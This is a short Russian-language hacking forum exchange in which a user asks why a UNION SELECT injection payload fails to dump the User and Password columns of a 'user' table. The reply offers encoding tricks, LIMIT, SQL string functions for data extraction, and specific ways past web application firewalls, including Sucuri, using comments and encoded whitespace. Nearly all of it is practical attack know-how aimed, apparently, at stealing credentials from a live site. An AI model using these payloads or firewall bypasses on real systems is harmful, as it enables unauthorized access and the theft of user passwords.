Сообщение от
teh
Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю
id=-561'+union+select+1,User,Password,4,5,6,7+FROM+use r+--+
ничего не выводить. Помогите, как зделать?
захексить или зачарить, или добавить лимит, или заюзать что-то типа:
INSERT(insert(table_schema,1,0,0x3a3a3a),1,0,tAble _Name)
MAKE_SET(1|2,@@version,USER())
EXPORT_SET(1,user(),version(),',',2)
LPAD('Chat','8','Anti')
или обойти WAF,например, если
403: Access Forbidden
Обходится элементарно с помощью "(" и ")", /**/, %0А, %0d, %09, %20 и т.д., или
Sucuri WebSite Firewall - CloudProxy - Access Denied
Обходится так: union/*123*/select
и т.д.
Короче, вобщем смотря по ситуации что там.